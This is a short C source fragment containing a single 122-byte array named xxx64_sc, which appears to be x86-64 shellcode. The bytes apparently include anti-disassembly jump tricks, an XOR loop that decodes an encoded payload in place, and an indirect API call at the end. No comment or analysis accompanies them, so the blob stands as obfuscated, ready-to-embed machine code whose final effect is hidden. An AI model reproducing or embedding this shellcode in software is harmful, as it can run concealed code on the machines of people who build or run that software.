unsigned char xxx64_sc[] = {
  0x66, 0xb8, 0xeb, 0x05, 0x31, 0xc9, 0x74, 0xfa, 0xe8, 0xb9, 0x25, 0x00,
  0x00, 0x01, 0x67, 0x66, 0x8b, 0x11, 0x66, 0x31, 0xc2, 0x66, 0x89, 0x11,
  0x83, 0xc1, 0x02, 0x81, 0xf9, 0x4d, 0x00, 0x00, 0x01, 0x75, 0xec, 0xeb,
  0x29, 0x83, 0x71, 0x9f, 0x75, 0xd1, 0x59, 0xb7, 0x60, 0x9d, 0x6c, 0x87,
  0x76, 0x82, 0x71, 0x8e, 0x2b, 0x84, 0x77, 0x8c, 0x59, 0x8e, 0x73, 0x82,
  0x69, 0xc5, 0x60, 0x93, 0x60, 0xeb, 0x05, 0x88, 0x3f, 0xb7, 0x34, 0xc5,
  0x60, 0x93, 0x60, 0xeb, 0x05, 0x4c, 0x8d, 0x04, 0x25, 0x25, 0x00, 0x00,
  0x01, 0x48, 0x8d, 0x14, 0x25, 0x44, 0x00, 0x00, 0x01, 0x66, 0xb8, 0xeb,
  0x05, 0x31, 0xc9, 0x74, 0xfa, 0xe8, 0x45, 0x33, 0xc9, 0x33, 0xc9, 0x48,
  0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0xff, 0x15, 0x12, 0x11,
  0x00, 0x00
};
unsigned int xxx64_sc_len = 122;